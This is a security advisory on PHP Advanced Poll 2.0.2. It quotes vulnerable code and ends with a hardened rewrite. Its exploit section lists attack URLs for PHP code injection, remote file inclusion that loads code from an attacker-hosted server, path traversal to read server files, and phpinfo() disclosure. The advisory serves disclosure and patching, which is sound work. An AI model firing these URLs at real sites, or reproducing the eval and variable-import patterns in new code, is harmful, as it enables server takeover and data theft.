php.advanced.poll.txt

Reported: 30 Oct 2003 00:00:00 | Reported by: Frog Man | Type: packetstorm | Source: packetstormsecurity.com

PHP Advanced Poll version 2.0.2 is vulnerable to PHP code injection and file inclusion.


Information :
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- phpinfo() disclosure


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

```php
// [...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
    if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
        // the trimmed request value is spliced into PHP source and eval()ed
        eval("\$$register_poll_vars[$i] = \"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
    } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
    } else {
        eval("\$$register_poll_vars[$i] = '';");
    }
}
// [...]
```

booth.php, png.php :

```php
<?php

$include_path = dirname(__FILE__);
if ($include_path == "/") {
    $include_path = ".";
}

if (!isset($PHP_SELF)) {
    // Only runs when register_globals=OFF (otherwise $PHP_SELF is already set):
    // every GET, POST and cookie parameter becomes a global variable of the
    // same name, so a request can overwrite the $include_path assigned above.
    global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
}

// $include_path may now come from the request and is used unvalidated
require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
// [...]
```

poll_ssi.php, popup.php :

```php
include "./booth.php";
```

admin/common.inc.php :

```php
// [...]
if (!isset($PHP_SELF)) {
    // same register_globals emulation as in booth.php
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
// $base_path and $pollvars[lang] can both come from the request: the first
// allows a remote include, the second a path traversal; neither is validated
if (file_exists("$base_path/lang/$pollvars[lang]")) {
    include ("$base_path/lang/$pollvars[lang]");
} else {
    include ("$base_path/lang/english.php");
}
// [...]
```

In the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

:

```php
// [...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

// common.inc.php re-imports request parameters, so $base_path set above is
// overwritten when register_globals=OFF
require "./common.inc.php";
// [...]
```

misc/info.php :

```php
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
```


Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//

or with a POST form or cookies.

- This only works if register_globals=OFF (this is not a typo: the GET/POST/COOKIE import loop in booth.php only runs when $PHP_SELF is not already set, i.e. when register_globals is off) :

http://[target]/booth.php?include_path=http://[attacker] (or with png.php, poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This works if register_globals=OFF or ON :

http://[target]/admin/common.inc.php?base_path=http://[attacker] will include the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view


- http://[target]/misc/info.php shows the phpinfo() output.


Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both the patch and further details can be found on http://www.phpsecure.info .


Credits :
°°°°°°°°
frog-m@n
http://www.phpsecure.info
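A hardened rewrite of the three request-handling patterns the advisory shows (the eval-based variable registration in comments.php, the register_globals emulation loop in booth.php and admin/common.inc.php, and the language-file include), added here as an example; it is not the vendor's patch from phpsecure.info. It assumes PHP 7 or later ($_GET/$_POST superglobals, __DIR__) and the original layout with lang/ beside the script directory; the function names register_poll_vars and resolve_lang_file are this example's own.

```php
<?php
// Added example: hardened equivalents of the vulnerable patterns in the advisory.
// Assumes PHP 7+ and the original layout (lang/ next to the calling directory).

// comments.php: the original eval()s request data to create $id, $template_set and
// $action. Whitelist the names and copy values into an array: no eval(), no $$name.
function register_poll_vars(array $get, array $post): array
{
    $vars = ['id' => '', 'template_set' => '', 'action' => ''];
    foreach (array_keys($vars) as $name) {
        if (isset($post[$name]) && is_string($post[$name])) {
            $vars[$name] = trim($post[$name]);
        } elseif (isset($get[$name]) && is_string($get[$name])) {
            $vars[$name] = trim($get[$name]);
        }
    }
    return $vars;
}

// admin/common.inc.php: $pollvars[lang] was passed to include() verbatim. Accept only
// a plain lower-case file name that resolves to an existing file inside lang/.
function resolve_lang_file(string $base_path, $requested): string
{
    $default = $base_path . '/lang/english.php';
    if (!is_string($requested) || !preg_match('/^[a-z]{1,16}\.php$/', $requested)) {
        return $default;          // rejects "../", "://", and anything non-alphabetic
    }
    $langdir = realpath($base_path . '/lang');
    $file = realpath($base_path . '/lang/' . $requested);
    if ($langdir === false || $file === false
        || strpos($file, $langdir . DIRECTORY_SEPARATOR) !== 0) {
        return $default;          // symlink or traversal left lang/: fall back
    }
    return $file;
}

// booth.php / admin/*.php: paths come from the filesystem only. The GET/POST/COOKIE
// import loop is dropped, so no request parameter can become a global variable.
$include_path = __DIR__;
$base_path = dirname($include_path);

$poll = register_poll_vars($_GET, $_POST);
$lang_requested = (isset($_GET['pollvars']) && is_array($_GET['pollvars']))
    ? ($_GET['pollvars']['lang'] ?? null) : null;
$lang_file = resolve_lang_file($base_path, $lang_requested);

require $include_path . '/include/config.inc.php';
include $lang_file;
```

The misc/info.php script has no role in a deployment; the fix for that finding is to delete the file rather than restrict it.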

Vulners AI Score: 7.4 (High risk)